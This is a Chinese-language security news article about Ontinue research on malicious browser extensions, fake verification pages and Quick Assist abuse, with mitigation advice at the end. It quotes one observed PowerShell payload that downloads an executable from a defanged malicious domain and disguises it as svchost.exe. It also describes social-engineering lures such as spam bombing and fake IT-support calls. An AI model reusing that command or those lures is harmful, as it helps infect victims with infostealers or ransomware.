一波利用浏览器扩展程序和可信系统工具的新型网络攻击,已成为对企业安全的重大威胁。
在过去六个月里,威胁行为者不断改进技术,通过具有欺骗性的浏览器插件传播恶意软件,并滥用 Microsoft 内置工具,如 Quick Assist。
这些攻击利用用户行为和合法软件功能绕过传统安全控制措施,即便在系统进行修复后仍能创建持久性后门。
恶意软件攻击活动采用恶意浏览器扩展程序,这些扩展程序通常通过受攻击的 Chrome Web Store 列表或恶意广告重定向进行传播。
一旦安装,这些扩展程序便会嵌入用户配置文件中,使威胁行为者能够窃取凭据、会话 cookie 和敏感数据。
关键在于,这些扩展程序在系统重新镜像后依然存在,因为受害者在设备恢复过程中常常重新引入受感染的浏览器配置文件。
这种持续存在机制确保了反复感染,加大了缓解攻击的难度。
Ontinue 分析师发现,攻击者将这些扩展程序与社会工程策略相结合,以执行恶意 PowerShell 命令。
在一种常见的恶意广告方案中,用户会被重定向到虚假验证页面,页面指示他们按下 Windows + R 组合键并粘贴经过混淆的 PowerShell 代码。
在实际中观察到的一个典型有效载荷如下:
Start-BitsTransfer -Source “hxxps://malicious [.] domain/update.exe” -Destination “env:Temp\svchost.exe”
该脚本会下载一个伪装成合法 Windows 进程的二级有效载荷,通常会部署像 Lumma 这样的信息窃取程序或勒索软件加载器。
滥用 Quick Assist 实现远程访问
这些攻击中的一个显著子主题是滥用 Microsoft 的 Quick Assist 工具来建立秘密远程访问。
Quick Assist 是一款预装的 Windows 应用程序,旨在进行远程故障排除。它要求受害者与伪装成 IT 支持人员的攻击者共享一个六位数验证码。
一旦获得访问权限,威胁行为者就会禁用安全工具、操纵注册表项以实现持续访问,并部署恶意软件。
Ontinue 研究人员指出,攻击者将这种策略与 “垃圾邮件轰炸” 活动相结合,受害者会收到数百封网络钓鱼邮件,从而混淆合法通信。
不堪其扰的用户随后会被迫联系虚假支持热线,攻击者在热线中引导他们启用 Quick Assist 会话。
入侵成功后,攻击者经常安装浏览器扩展程序以维持访问或窃取数据。
对 Quick Assist 的滥用凸显了将可信应用程序武器化的更广泛趋势。与第三方工具不同,Quick Assist 因其由 Microsoft 签名的来源而绕过了端点检测规则。
这为攻击者提供了操作优势,因为安全团队通常优先监测不太常见的远程访问软件。
缓解策略包括在企业环境中通过组策略禁用 Quick Assist,并审核浏览器扩展程序是否存在未经授权或可疑的权限。
Ontinue 建议划分网络区域以限制横向移动,并实施严格的 PowerShell 执行策略。
随着攻击者不断改进对合法工具的滥用方式,持续监测和用户教育对于应对这些威胁仍然至关重要。
发表评论
您还未登录,请先登录。
登录